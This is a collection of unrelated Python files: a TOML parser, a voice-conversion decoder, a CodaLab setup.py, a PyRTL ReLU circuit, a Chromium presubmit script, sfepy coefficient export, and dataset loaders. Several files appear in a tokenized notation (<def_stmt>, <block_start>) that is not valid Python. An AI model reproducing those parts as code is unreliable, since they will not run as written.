<block_start><return>self._idx<block_end>@property<def_stmt>current self# type: () -> TOMLChar <block_start><return>self._current<block_end>@property<def_stmt>marker self# type: () -> int <block_start><return>self._marker<block_end><def_stmt>extract self# type: () -> unicode <block_start>""" Extracts the value between marker and index """<line_sep><return>self[self._marker:self._idx]<block_end><def_stmt>inc self exception=<none># type: (Optional[Type[ParseError]]) -> bool <block_start>""" Increments the parser if the end of the input has not been reached. Returns whether or not it was able to advance. 
"""<try_stmt><block_start>self._idx,self._current=next(self._chars)<line_sep><return><true><block_end><except_stmt>StopIteration<block_start>self._idx=len(self)<line_sep>self._current=self.EOF<if_stmt>exception<block_start><raise>self.parse_error(exception)<block_end><return><false><block_end><block_end><def_stmt>inc_n self n exception=<none># type: (int, Exception) -> bool <block_start>""" Increments the parser by n characters if the end of the input has not been reached. """<for_stmt>_ range(n)<block_start><if_stmt><not>self.inc(exception=exception)<block_start><return><false><block_end><block_end><return><true><block_end><def_stmt>consume self chars min=0 max=-1<block_start>""" Consume chars until min/max is satisfied is valid. """<while_stmt>self.current<in>chars<and>max<ne>0<block_start>min<augsub>1<line_sep>max<augsub>1<if_stmt><not>self.inc()<block_start><break><block_end><block_end># failed to consume minimum number of characters <if_stmt>min<g>0<block_start>self.parse_error(UnexpectedCharError)<block_end><block_end><def_stmt>end self# type: () -> bool <block_start>""" Returns True if the parser has reached the end of the input. """<line_sep><return>self._current<is>self.EOF<block_end><def_stmt>mark self# type: () -> None <block_start>""" Sets the marker to the index's current position """<line_sep>self._marker=self._idx<block_end><def_stmt>parse_error self exception=ParseError *args# type: (Type[ParseError], Any) -> ParseError <block_start>""" Creates a generic "parse error" at the current position. """<line_sep>line,col=self._to_linecol()<line_sep><return>exception(line col *args)<block_end><def_stmt>_to_linecol self# type: () -> Tuple[int, int] <block_start>cur=0<for_stmt>i,line enumerate(self.splitlines())<block_start><if_stmt>cur+len(line)+1<g>self.idx<block_start><return>(i+1 self.idx-cur)<block_end>cur<augadd>len(line)+1<block_end><return>len(self.splitlines()) 0<block_end><block_end>
import torch
import torch.nn as nn
import torch.nn.functional as F

from .cond_bn import ConditionalBatchNorm1d


# adopted Generator ResBlock from https://arxiv.org/abs/1909.11646
class GBlock(nn.Module):
    """Conditional residual block of four dilated 1-D convolutions."""

    def __init__(self, in_channels, out_channels, condition_dim):
        super().__init__()
        self.cond_bn = nn.ModuleList([
            ConditionalBatchNorm1d(
                in_channels if i == 0 else out_channels, condition_dim)
            for i in range(4)
        ])
        self.leaky_relu = nn.LeakyReLU(0.2)
        self.cnn = nn.ModuleList([
            nn.Conv1d(
                in_channels if i == 0 else out_channels, out_channels,
                kernel_size=3, dilation=2 ** i, padding=2 ** i)
            for i in range(4)
        ])
        self.shortcut = nn.Conv1d(in_channels, out_channels, kernel_size=1)

    @staticmethod
    def _mask_fill(x, mask):
        # Zero out masked positions in-place; no-op when mask is None.
        if mask is not None:
            x.masked_fill_(mask, 0.0)
        return x

    def forward(self, x, z, mask=None):
        residual = x
        x = self._mask_fill(self.cnn[0](self.leaky_relu(self.cond_bn[0](x, z))), mask)
        x = self._mask_fill(self.cnn[1](self.leaky_relu(self.cond_bn[1](x, z))), mask)
        x = self._mask_fill(x + self.shortcut(residual), mask)

        residual = x
        x = self._mask_fill(self.cnn[2](self.leaky_relu(self.cond_bn[2](x, z))), mask)
        x = self._mask_fill(self.cnn[3](self.leaky_relu(self.cond_bn[3](x, z))), mask)
        return x + residual


class VCDecoder(nn.Module):
    """Decode linguistic + pitch features into a mel spectrogram, conditioned on speaker."""

    def __init__(self, hp):
        super().__init__()
        self.stem = nn.Conv1d(
            hp.chn.encoder + hp.chn.residual_out, hp.chn.gblock[0],
            kernel_size=7, padding=3)
        self.gblock = nn.ModuleList([
            GBlock(in_channels, out_channels, hp.chn.speaker.token)
            for in_channels, out_channels in zip(
                list(hp.chn.gblock)[:-1], hp.chn.gblock[1:])
        ])
        self.final = nn.Conv1d(
            hp.chn.gblock[-1], hp.audio.n_mel_channels, kernel_size=1)

    def forward(self, x, speaker_emb, mask=None):
        # x: linguistic features + pitch info.
        # [B, chn.encoder + chn.residual_out, T_dec]
        x = GBlock._mask_fill(self.stem(x), mask)  # [B, chn.gblock[0], T]
        for gblock in self.gblock:
            x = gblock(x, speaker_emb, mask)
        # x: [B, chn.gblock[-1], T]
        return GBlock._mask_fill(self.final(x), mask)  # [B, M, T]
from setuptools import setup, find_packages
from setuptools.command.install import install
import os
import setuptools
import sys

# should match codalab/common.py#CODALAB_VERSION
CODALAB_VERSION = "1.1.4"


class Install(install):
    """`install` command that warns when the CLI lands outside of $PATH."""

    _WARNING_TEMPLATE = (
        '\n\n\033[1m\033[93mWarning! CodaLab was installed at {}, which is not\n'
        'one of the following paths in $PATH:\n\n{}\n\nConsider adding {} to $PATH\n'
        'to use the CodaLab CLI. You can do this by {}\033[0m\n\n'
    )
    _UNIX_FIX = 'appending the following line to your .bashrc:\nexport PATH="$PATH:{}"'
    _WINDOWS_FIX = (
        'by selecting System from the Control Panel, selecting Advanced system\n'
        'settings, clicking Environment Variables and adding {} to the list.'
    )
    _WINDOWS_PLATFORM_VALUES = {'win32', 'cygwin'}

    @staticmethod
    def _build_fix_message(installed_path):
        # Pick the platform-appropriate instructions for extending $PATH.
        if sys.platform in Install._WINDOWS_PLATFORM_VALUES:
            return Install._WINDOWS_FIX.format(installed_path)
        return Install._UNIX_FIX.format(installed_path)

    def run(self):
        install.run(self)
        self._check_path()

    def _check_path(self):
        cl_path = self.install_scripts
        executable_paths = os.environ['PATH'].split(os.pathsep)
        if cl_path not in executable_paths:
            # Prints a yellow, bold warning message in regards to the installation path not in $PATH
            print(
                Install._WARNING_TEMPLATE.format(
                    cl_path,
                    '\n'.join(executable_paths),
                    cl_path,
                    Install._build_fix_message(cl_path),
                )
            )


def get_requirements(*requirements_file_paths):
    """Collect requirement lines from the given files, skipping `-r` includes."""
    requirements = []
    for requirements_file_path in requirements_file_paths:
        with open(requirements_file_path) as requirements_file:
            for line in requirements_file:
                if line[0:2] != '-r':
                    requirements.append(line.strip())
    return requirements


if int(setuptools.__version__.split('.')[0]) < 25:
    print(
        "WARNING: Please upgrade setuptools to a newer version, otherwise installation may break. "
        "Recommended command: `pip3 install -U setuptools`"
    )

setup(
    name='codalab',
    version=CODALAB_VERSION,
    description='CLI for CodaLab, a platform for reproducible computation',
    long_description=(
        'Visit https://worksheets.codalab.org/ or setup your own server by following the '
        'instructions in the documentation (https://codalab-worksheets.readthedocs.io/en/latest/Server-Setup).'
    ),
    url='https://github.com/codalab/codalab-worksheets',
    author='CodaLab',
    author_email='<EMAIL>',
    license='Apache License 2.0',
    keywords='codalab reproducible computation worksheets competitions',
    packages=find_packages(exclude=["tests*"]),
    classifiers=[
        "Programming Language :: Python :: 3 :: Only",
        "Programming Language :: Python :: 3.6",
        "License :: OSI Approved :: Apache Software License",
    ],
    py_modules=['codalab_service'],
    python_requires='~=3.6',
    cmdclass={'install': Install},
    include_package_data=True,
    install_requires=get_requirements('requirements.txt'),
    entry_points={
        'console_scripts': [
            'cl=codalab.bin.cl:main',
            'cl-server=codalab.bin.server:main',
            'cl-bundle-manager=codalab.bin.bundle_manager:main',
            'codalab-service=codalab_service:main',
            'cl-worker=codalab.worker.main:main',
            'cl-worker-manager=codalab.worker_manager.main:main',
            'cl-competitiond=scripts.competitiond:main',
        ]
    },
    zip_safe=False,
)
# Function: Relu and normalization
# Comments: offset defined during design phase (not runtime)
import pyrtl


# relu and normalization
def relu_nrml(din, offset=0):
    """ReLU a 32-bit signed value, then return an 8-bit window of the result.

    din: 32-bit WireVector; inputs with the sign bit set are clamped to 0.
    offset: design-time shift; selects bits [24-offset, 32-offset).
    """
    # NOTE: the whole body belongs inside the function; in the broken original
    # everything after the first assert sat at module level, where `din`,
    # `offset` and `return` are undefined/illegal.
    assert len(din) == 32
    assert offset <= 24
    dout = pyrtl.WireVector(32)
    with pyrtl.conditional_assignment:
        with din[-1] == 0:
            dout |= din
        with pyrtl.otherwise:
            dout |= 0
    return dout[24 - offset:32 - offset]


# Test: collects only the 8 LSBs (after relu)
relu_in = pyrtl.Register(bitwidth=32, name='din')
relu_in.next <<= 300
offset = 24
dout = relu_nrml(relu_in, offset)
relu_out = pyrtl.Register(bitwidth=8, name='dout')
relu_out.next <<= dout

# simulate the instantiated design for 35 cycles
sim_trace = pyrtl.SimulationTrace()
sim = pyrtl.Simulation(tracer=sim_trace)
for cycle in range(35):
    sim.step({})
sim_trace.render_trace()
""" Testing for the spaghetti api import structure. """<import_stmt>unittest<import_from_stmt>.network_unittest_classes TestNetwork<import_from_stmt>.network_unittest_classes TestNetworkPointPattern<import_from_stmt>.network_unittest_classes TestNetworkAnalysis<line_sep># api import structure <import_stmt>spaghetti<line_sep># run tests on spaghetti.network.Network TestNetwork.spaghetti=spaghetti<line_sep>TestNetwork()<line_sep># run tests on spaghetti.network.PointPattern TestNetworkPointPattern.spaghetti=spaghetti<line_sep>TestNetworkPointPattern()<line_sep># run tests on spaghetti.analysis TestNetworkAnalysis.spaghetti=spaghetti<line_sep>TestNetworkAnalysis()<if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
from optparse import make_option

from django.core.management.base import AppCommand
from django.core.management.sql import sql_custom
from django.db import connections, DEFAULT_DB_ALIAS


class Command(AppCommand):
    """Management command printing each app's custom SQL."""

    help = "Prints the custom table modifying SQL statements for the given app name(s)."

    option_list = AppCommand.option_list + (
        make_option(
            '--database', action='store', dest='database',
            default=DEFAULT_DB_ALIAS,
            help='Nominates a database to print the SQL for. Defaults to the "default" database.'),
    )

    output_transaction = True

    def handle_app(self, app, **options):
        connection = connections[options.get('database')]
        statements = sql_custom(app, self.style, connection)
        return u'\n'.join(statements).encode('utf-8')
import sys

import chardet


def _to_unicode(raw_line):
    """Decode a raw byte line as UTF-8, falling back to chardet's guess."""
    try:
        return raw_line.decode("utf-8")
    except UnicodeDecodeError:
        return raw_line.decode(chardet.detect(raw_line)["encoding"])


# Convert "label:sub text..." lines into "text<TAB>label" lines.
# BUGFIX: the original opened both files without ever closing them;
# `with` guarantees they are closed (and output flushed) on any exit path.
with open(sys.argv[1], "rb") as fin, open(sys.argv[2], "w") as fout:
    for line in fin:
        line = _to_unicode(line)
        data = line.strip().split()
        text = " ".join(data[1:])
        label = data[0].split(":")[0]
        fout.write("{}\t{}\n".format(text, label))
import numpy as np
from scipy import stats


def max_slope(t, x):
    """Compute the largest rate of change in the observed data."""
    rates = np.diff(x) / np.diff(t)
    return np.max(np.abs(rates))


def maximum(x):
    """Maximum observed value."""
    return np.max(x)


def median(x):
    """Median of observed values."""
    return np.median(x)


def median_absolute_deviation(x):
    """Median absolute deviation (from the median) of the observed values."""
    med = np.median(x)
    return np.median(np.abs(x - med))


def minimum(x):
    """Minimum observed value."""
    return np.min(x)


def percent_beyond_1_std(x, e):
    """Percentage of values more than 1 std. dev. from the weighted average."""
    mu = weighted_average(x, e)
    sigma = weighted_std_dev(x, e)
    return np.mean(np.abs(x - mu) > sigma)


def percent_close_to_median(x, window_frac=0.1):
    """Percentage of values within window_frac*(max(x)-min(x)) of median."""
    half_width = (np.max(x) - np.min(x)) * window_frac
    return np.mean(np.abs(x - np.median(x)) < half_width)


def skew(x):
    """Skewness of a dataset. Approximately 0 for Gaussian data."""
    return stats.skew(x)


def std(x):
    """Standard deviation of observed values."""
    return np.std(x)


def weighted_average(x, e):
    """Arithmetic mean of observed values, weighted by measurement errors."""
    weights = 1. / (e ** 2)
    return np.average(x, weights=weights)


def weighted_average_std_err(x, e):
    """
    Standard deviation of the sample weighted average of values x with
    measurement errors e.

    Note: this is not the same as the weighted sample standard deviation; this
    value only quantifies the measurement errors, not the dispersion of the
    data.
    """
    return np.sqrt(1.0 / np.sum(e ** 2))


def weighted_std_dev(x, e):
    """Standard deviation of observed values, weighted by measurement errors."""
    weights = 1. / (e ** 2)
    mu = weighted_average(x, e)
    return np.sqrt(np.average((x - mu) ** 2, weights=weights))
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enforces luci-milo.cfg consistency.

See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts
for more details on the presubmit API built into depot_tools.
"""

PRESUBMIT_VERSION = '2.0.0'

USE_PYTHON3 = True

_IGNORE_FREEZE_FOOTER = 'Ignore-Freeze'

# The time module's handling of timezones is abysmal, so the boundaries are
# precomputed in UNIX time
_FREEZE_START = 1639641600  # 2021/12/16 00:00 -0800
_FREEZE_END = 1641196800  # 2022/01/03 00:00 -0800


def CheckFreeze(input_api, output_api):
    """Block CLs during the prod freeze window unless the ignore footer is set."""
    if _FREEZE_START <= input_api.time.time() < _FREEZE_END:
        footers = input_api.change.GitFootersFromDescription()
        if _IGNORE_FREEZE_FOOTER not in footers:

            def convert(t):
                ts = input_api.time.localtime(t)
                return input_api.time.strftime('%Y/%m/%d %H:%M %z', ts)

            return [
                output_api.PresubmitError(
                    'There is a prod freeze in effect from {} until {},'
                    ' files in //infra/config cannot be modified'.format(
                        convert(_FREEZE_START), convert(_FREEZE_END)))
            ]

    return []


def CheckTests(input_api, output_api):
    """Run the *_test.py unit tests next to this file."""
    glob = input_api.os_path.join(input_api.PresubmitLocalPath(), '*_test.py')
    tests = input_api.canned_checks.GetUnitTests(
        input_api,
        output_api,
        input_api.glob(glob),
        run_on_python2=False,
        run_on_python3=True,
        skip_shebang_check=True)
    return input_api.RunTests(tests)


def CheckLintLuciMilo(input_api, output_api):
    """Lint luci-milo.cfg whenever it or the linter itself changed."""
    if ('infra/config/generated/luci/luci-milo.cfg' in input_api.LocalPaths()
            or 'infra/config/lint-luci-milo.py' in input_api.LocalPaths()):
        return input_api.RunTests([
            input_api.Command(
                name='lint-luci-milo',
                cmd=[input_api.python_executable, 'lint-luci-milo.py'],
                kwargs={},
                message=output_api.PresubmitError),
        ])
    return []


def CheckTestingBuildbot(input_api, output_api):
    """Cross-check the milo configs against testing/buildbot."""
    if ('infra/config/generated/luci/luci-milo.cfg' in input_api.LocalPaths()
            or 'infra/config/generated/luci/luci-milo-dev.cfg'
            in input_api.LocalPaths()):
        return input_api.RunTests([
            input_api.Command(
                name='testing/buildbot config checks',
                cmd=[
                    input_api.python_executable,
                    input_api.os_path.join('..', '..', 'testing', 'buildbot',
                                           'generate_buildbot_json.py'),
                    '--check'
                ],
                kwargs={},
                message=output_api.PresubmitError),
        ])
    return []


def CheckLucicfgGenOutputMain(input_api, output_api):
    return input_api.RunTests(
        input_api.canned_checks.CheckLucicfgGenOutput(input_api, output_api,
                                                      'main.star'))


def CheckLucicfgGenOutputDev(input_api, output_api):
    return input_api.RunTests(
        input_api.canned_checks.CheckLucicfgGenOutput(input_api, output_api,
                                                      'dev.star'))


def CheckChangedLUCIConfigs(input_api, output_api):
    return input_api.canned_checks.CheckChangedLUCIConfigs(
        input_api, output_api)


# Footer indicating a CL that is trying to address an outage by some mechanism
# other than those in infra/config/outages
_OUTAGE_ACTION_FOOTER = 'Infra-Config-Outage-Action'
# Footer acknowledging that an outages configuration is in effect when making an
# unrelated change
_IGNORE_OUTAGE_FOOTER = 'Infra-Config-Ignore-Outage'


def CheckOutagesConfigOnCommit(input_api, output_api):
    """Make sure CL footers agree with the current outages configuration."""
    outages_pyl = input_api.os_path.join(input_api.PresubmitLocalPath(),
                                         'generated/outages.pyl')
    with open(outages_pyl) as f:
        outages_config = input_api.ast.literal_eval(f.read())

    # No outage in effect: neither outage footer should be present.
    if not outages_config:
        footers = input_api.change.GitFootersFromDescription()
        return [
            output_api.PresubmitError(
                'There is no outages configuration in effect, '
                'please remove the {} footer from your CL description.'.format(
                    footer))
            for footer in (_OUTAGE_ACTION_FOOTER, _IGNORE_OUTAGE_FOOTER)
            if footer in footers
        ]

    # Any of the config files under infra/config/outages
    outages_config_files = set()
    # Any of the config files under infra/config/generated
    generated_config_files = set()
    # Any config files that are not under infra/config/outages or
    # infra/config/generated
    config_files = set()

    for p in input_api.LocalPaths():
        if p in ('README.md', 'OWNERS'):
            continue
        if p.startswith('infra/config/outages/'):
            outages_config_files.add(p)
            continue
        if p.startswith('infra/config/generated/'):
            generated_config_files.add(p)
            continue
        config_files.add(p)

    # If the only changes to non-generated config files were the outages files,
    # assume the change was addressing an outage and that no additional
    # mechanism needs to be added
    if outages_config_files and not config_files:
        # REVIEWER: Should we prevent the footers from being here in this case?
        return []

    # If any non-generated, non-outages files were modified or if the generated
    # config files were modified without any config files being modified
    # (lucicfg change, etc.) then make sure the user knows that when the
    # outages configuration is disabled, the generated configuration may change
    if config_files or generated_config_files:
        footers = input_api.change.GitFootersFromDescription()
        has_action_footer = _OUTAGE_ACTION_FOOTER in footers
        has_ignore_footer = _IGNORE_OUTAGE_FOOTER in footers

        if has_action_footer and has_ignore_footer:
            return [
                output_api.PresubmitError(
                    'Only one of {} or {} should be present in your CL description'
                    .format(_OUTAGE_ACTION_FOOTER, _IGNORE_OUTAGE_FOOTER)),
            ]

        if not has_action_footer and not has_ignore_footer:
            outages_config_lines = [
                '{}: {}'.format(k, v)
                for k, v in sorted(outages_config.items())
            ]
            return [
                output_api.PresubmitError('\n'.join([
                    'The following outages configuration is in effect:\n {}'
                    .format('\n '.join(outages_config_lines)),
                    ('The effect of your change may not be visible '
                     'in the generated configuration.'),
                    ('If your change is addressing the outage, '
                     'please add the footer {} with a link for the outage.'
                     ).format(_OUTAGE_ACTION_FOOTER),
                    ('If your change is not addressing the outage '
                     'but you still wish to land it, please add the footer '
                     '{} with a reason.').format(_IGNORE_OUTAGE_FOOTER),
                    ('For more information on outages configuration, '
                     'see https://chromium.googlesource.com/chromium/src/+/HEAD/infra/config/outages'
                     ),
                ])),
            ]

    return []
<import_from_future_stmt> absolute_import<import_stmt>numpy<as>nm<import_from_stmt>sfepy.base.base ordered_iteritems Struct basestr<import_from_stmt>sfepy.base.ioutils read_dict_hdf5 write_dict_hdf5<import_from_stmt>sfepy.homogenization.utils iter_sym<import_stmt>six<import_from_stmt>six.moves range<def_stmt>coef_arrays_to_dicts idict format='%s/%d'<block_start>out={}<for_stmt>k,v six.iteritems(idict)<block_start><if_stmt>isinstance(v list)<block_start>out.update({format%(k ii):vv<for>ii,vv enumerate(v)})<block_end><else_stmt><block_start>out[k]=v<block_end><block_end><return>out<block_end><class_stmt>Coefficients(Struct)<block_start>""" Class for storing (homogenized) material coefficients. """<def_stmt>from_file_hdf5 filename<block_start>obj=Coefficients()<line_sep>obj.__dict__=read_dict_hdf5(filename)<for_stmt>key,val six.iteritems(obj.__dict__)<block_start><if_stmt>type(val)<eq>list<block_start><for_stmt>ii,vv enumerate(val)<block_start>val[ii]=nm.array(vv dtype=nm.float64)<block_end><block_end><block_end><return>obj<block_end>from_file_hdf5=staticmethod(from_file_hdf5)<def_stmt>to_file_hdf5 self filename<block_start>write_dict_hdf5(filename self.__dict__)<block_end><def_stmt>_escape_latex self txt<block_start><return>txt.replace('_' '\_').replace('%' '\%')<block_end><def_stmt>_format self val<block_start>out=self._a_format%val<if_stmt>self._a_cdot<block_start>a1,a2=out.split('e')<if_stmt>(self._a_filter<is><not><none>)<and>(int(a2)<l>self._a_filter)<block_start>out='0'<block_end><else_stmt><block_start>out='%s \cdot 10^{%s}'%(a1 int(a2))<block_end><block_end><return>out<block_end><def_stmt>_write1d self fd val<block_start>fd.write(r' \begin{equation}')<line_sep>fd.write('\n')<line_sep>fd.write(r' \left[')<line_sep>fd.write('\n')<line_sep>fd.write(', '.join([self._format(vv)<for>vv val]))<line_sep>fd.write('\n')<line_sep>fd.write(r' \right]')<line_sep>fd.write('\n')<line_sep>fd.write(r' \end{equation}')<line_sep>fd.write('\n')<block_end><def_stmt>_write2d self 
fd val<block_start>fd.write(r' \begin{equation}')<line_sep>fd.write('\n')<line_sep>fd.write(r' \left[\begin{array}{%s}'%('c'<times>val.shape[0]))<line_sep>fd.write('\n')<for_stmt>ir range(val.shape[1])<block_start><for_stmt>ic range(val.shape[0])<block_start>fd.write(' '+self._format(val[ir ic]))<if_stmt>ic<l>(val.shape[0]-1)<block_start>fd.write(r' & ')<block_end><elif_stmt>ir<l>(val.shape[1]-1)<block_start>fd.write(r' \\')<line_sep>fd.write('\n')<block_end><block_end><block_end>fd.write('\n')<line_sep>fd.write(r' \end{array}\right]')<line_sep>fd.write('\n')<line_sep>fd.write(r' \end{equation}')<line_sep>fd.write('\n')<block_end><def_stmt>_save_dict_latex self adict fd names idx=<none><block_start>fd.write(r'\begin{itemize}')<line_sep>fd.write('\n')<for_stmt>key,val ordered_iteritems(adict)<block_start><if_stmt>key.startswith('_a_')<block_start><continue><block_end><try_stmt><block_start>lname=names[key]<block_end><except_stmt><block_start>lname=self._escape_latex(key)<block_end>fd.write('\item %s:'%lname)<line_sep>fd.write('\n')<if_stmt>isinstance(val list)<block_start><if_stmt>idx<is><not><none><block_start>val=val[idx]<block_end><else_stmt><block_start><raise>NotImplementedError("'idx' must be set in the case "<concat>"of multi-coefficients!")<block_end><block_end><if_stmt>isinstance(val dict)<block_start>self._save_dict_latex(val fd names)<block_end><elif_stmt>isinstance(val basestr)<block_start>fd.write(self._escape_latex(val)+'\n')<block_end><elif_stmt>isinstance(val float)<block_start>fd.write('$'+self._format(val)+'$\n')<block_end><elif_stmt>isinstance(val nm.ndarray)<block_start><if_stmt>val.ndim<eq>0<block_start>fd.write('$'+self._format(val)+'$\n')<block_end><elif_stmt>val.ndim<eq>1<block_start>self._write1d(fd val)<block_end><elif_stmt>val.ndim<eq>2<block_start>self._write2d(fd val)<block_end><block_end><else_stmt><block_start>fd.write('%s'%val)<block_end><block_end>fd.write(r'\end{itemize}')<line_sep>fd.write('\n\n')<block_end><def_stmt>to_file_latex 
self filename names format='%.2e' cdot=<false> filter=<none> idx=<none><block_start>r""" Save the coefficients to a file in LaTeX format. Parameters ---------- filename : str The name of the output file. names : dict Mapping of attribute names to LaTeX names. format : str Format string for numbers. cdot : bool For '%.e' formats only. If True, replace 'e' by LaTeX '\cdot 10^{exponent}' format. filter : int For '%.e' formats only. Typeset as 0, if exponent is less than `filter`. idx : int For multi-coefficients, set the coefficient index. """<line_sep>self._a_format=format<line_sep>self._a_cdot=cdot<line_sep>self._a_filter=filter<line_sep>fd=open(filename 'w')<line_sep>self._save_dict_latex(self.__dict__ fd names idx)<line_sep>fd.close()<block_end><def_stmt>_save_dict self adict fd names format<block_start>toremove=[]<line_sep>adict_complex={}<for_stmt>key,val ordered_iteritems(adict)<block_start><if_stmt>hasattr(val 'dtype')<and>nm.issubdtype(val.dtype nm.complexfloating)<block_start>adict_complex[key+'_real']=val.real<line_sep>adict_complex[key+'_imag']=val.imag<line_sep>toremove.append(key)<block_end><block_end><for_stmt>key toremove<block_start><del_stmt>(adict[key])<block_end>adict.update(adict_complex)<for_stmt>key,val ordered_iteritems(adict)<block_start><try_stmt><block_start>lname=names[key]<block_end><except_stmt><block_start>lname=key<block_end>fd.write('%s:\n'%lname)<if_stmt>hasattr(val 'to_file_txt')<block_start><if_stmt>val.to_file_txt<is><not><none><block_start>val.to_file_txt(fd format val)<block_end><else_stmt><block_start>fd.write('--\n')<block_end><block_end><elif_stmt>isinstance(val dict)<block_start>self._save_dict(val fd names format)<line_sep>fd.write('\n')<block_end><elif_stmt>isinstance(val list)<block_start><if_stmt>isinstance(val[0] basestr)<block_start>fd.write('\n'.join(val)+'\n')<block_end><block_end><elif_stmt>isinstance(val basestr)<block_start>fd.write(val+'\n')<block_end><elif_stmt>isinstance(val 
float)<block_start>fd.write('%e\n'%val)<block_end><elif_stmt>isinstance(val nm.ndarray)<block_start><if_stmt>val.ndim<eq>0<block_start>fd.write(format%val)<line_sep>fd.write('\n')<block_end><elif_stmt>val.ndim<eq>1<block_start><for_stmt>ic range(val.shape[0])<block_start>fd.write(format%val[ic])<if_stmt>ic<l>(val.shape[0]-1)<block_start>fd.write(', ')<block_end><else_stmt><block_start>fd.write('\n')<block_end><block_end><block_end><elif_stmt>val.ndim<eq>2<block_start><for_stmt>ir range(val.shape[0])<block_start><for_stmt>ic range(val.shape[1])<block_start>fd.write(format%val[ir ic])<if_stmt>ic<l>(val.shape[1]-1)<block_start>fd.write(', ')<block_end><elif_stmt>ir<l>(val.shape[0]-1)<block_start>fd.write(';\n')<block_end><block_end><block_end>fd.write('\n')<block_end><elif_stmt>val.ndim<eq>3<block_start><for_stmt>ii range(val.shape[0])<block_start>fd.write(' step %d:\n'%ii)<for_stmt>ir range(val.shape[1])<block_start><for_stmt>ic range(val.shape[2])<block_start>fd.write(' '+format%val[ii ir ic])<if_stmt>ic<l>(val.shape[2]-1)<block_start>fd.write(', ')<block_end><elif_stmt>ir<l>(val.shape[1]-1)<block_start>fd.write(';\n')<block_end><block_end><block_end>fd.write('\n')<block_end>fd.write('\n')<block_end><block_end><else_stmt><block_start>fd.write('--\n')<block_end>fd.write('\n')<block_end><block_end><def_stmt>to_file_txt self filename names format<block_start>fd=open(filename 'w')<line_sep>self._save_dict(coef_arrays_to_dicts(self.__dict__) fd names format)<line_sep>fd.close()<block_end>_table_vector=r""" \begin{center} \begin{tabular}{cc} i & value \\ %s \end{tabular} \end{center} """<line_sep>_table_matrix_1=r""" \begin{center} \begin{tabular}{cc} ij & value \\ %s \end{tabular} \end{center} """<line_sep>_table_matrix_2=r""" \begin{center} \begin{tabular}{cc} ijkl & value \\ %s \end{tabular} \end{center} """<line_sep>_itemize=r""" \begin{itemize} %s \end{itemize} """<line_sep>## # c: 09.07.2008, r: 09.07.2008 <def_stmt>_typeset self val dim style='table' format='%f' 
step=<none><block_start>sym=(dim+1)<times>dim<floordiv>2<line_sep>mode=<none><if_stmt>val.ndim<eq>0<block_start>mode='scalar'<block_end><elif_stmt>val.ndim<eq>1<block_start><if_stmt>val.shape[0]<eq>1<block_start>mode='scalar'<block_end><elif_stmt>val.shape[0]<eq>dim<block_start>mode='vector'<block_end><elif_stmt>val.shape[0]<eq>sym<block_start>mode='matrix_t1d'<block_end><block_end><elif_stmt>val.ndim<eq>2<block_start><if_stmt>val.shape[0]<eq>dim<block_start>mode='matrix_2D'<block_end><elif_stmt>val.shape[0]<eq>sym<block_start>mode='matrix_t2d'<block_end><block_end>out=''<if_stmt>mode<eq>'scalar'<block_start>out=format%val<block_end><elif_stmt>mode<eq>'vector'<block_start>aux=' \\\\\n'.join([r'$_%d$ & %s'%(ir+1 format%val[ir])<for>ir range(dim)])<line_sep>out=self._table_vector%aux<block_end><elif_stmt>mode<eq>'matrix_t1d'<block_start>aux=' \\\\\n'.join([r'$_{%d%d}$ & %s'%(ir+1 ic+1 format%val[ii])<for>ii,(ir ic) enumerate(iter_sym(dim))])<line_sep>out=self._table_matrix_1%aux<block_end><elif_stmt>mode<eq>'matrix_2D'<block_start>aux=' \\\\\n'.join([r'$_{%d%d}$ & %s'%(ir+1 ic+1 format%val[ir ic])<for>ir range(dim)<for>ic range(dim)])<line_sep>out=self._table_matrix_1%aux<block_end><elif_stmt>mode<eq>'matrix_t2d'<block_start>aux=' \\\\\n'.join([r'$_{%d%d%d%d}$ & %s'%(irr+1 irc+1 icr+1 icc+1 format%val[ii jj])<for>ii,(irr irc) enumerate(iter_sym(dim))<for>jj,(icr icc) enumerate(iter_sym(dim))])<line_sep>out=self._table_matrix_2%aux<block_end><return>out<block_end><def_stmt>to_latex self attr_name dim style='table' format='%f' step=<none><block_start>val=getattr(self attr_name)<if_stmt>step<is><not><none><block_start>val=val[step]<block_end><if_stmt>isinstance(val dict)<block_start>aux=''<for_stmt>key,dval six.iteritems(val)<block_start>aux2=r'\item %s : %s'%(key self._typeset(dval dim style format step))<line_sep>aux='\n'.join((aux aux2))<block_end>out=self._itemize%aux<block_end><else_stmt><block_start>out=self._typeset(val dim style format 
step)<block_end><return>out<block_end><block_end>
<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>shutil<import_stmt>sys<import_stmt>tempfile<import_from_stmt>observations.r.pension pension<def_stmt>test_pension <block_start>"""Test module pension.py by downloading pension.csv and testing shape of extracted data has 194 rows and 19 columns """<line_sep>test_path=tempfile.mkdtemp()<line_sep>x_train,metadata=pension(test_path)<try_stmt><block_start><assert_stmt>x_train.shape<eq>(194 19)<block_end><except_stmt><block_start>shutil.rmtree(test_path)<line_sep><raise>()<block_end><block_end>
# -*- coding: utf-8 -*- <import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>csv<import_stmt>numpy<as>np<import_stmt>os<import_stmt>sys<import_from_stmt>observations.util maybe_download_and_extract<def_stmt>randu path<block_start>"""Random Numbers from Congruential Generator RANDU 400 triples of successive random numbers were taken from the VAX FORTRAN function RANDU running under VMS 1.5. A data frame with 400 observations on 3 variables named `x`, `y` and `z` which give the first, second and third random number in the triple. <NAME> Args: path: str. Path to directory which either stores file or otherwise file will be downloaded and extracted there. Filename is `randu.csv`. Returns: Tuple of np.ndarray `x_train` with 400 rows and 3 columns and dictionary `metadata` of column headers (feature names). """<import_stmt>pandas<as>pd<line_sep>path=os.path.expanduser(path)<line_sep>filename='randu.csv'<if_stmt><not>os.path.exists(os.path.join(path filename))<block_start>url='http://dustintran.com/data/r/datasets/randu.csv'<line_sep>maybe_download_and_extract(path url save_file_name='randu.csv' resume=<false>)<block_end>data=pd.read_csv(os.path.join(path filename) index_col=0 parse_dates=<true>)<line_sep>x_train=data.values<line_sep>metadata={'columns':data.columns}<line_sep><return>x_train metadata<block_end>
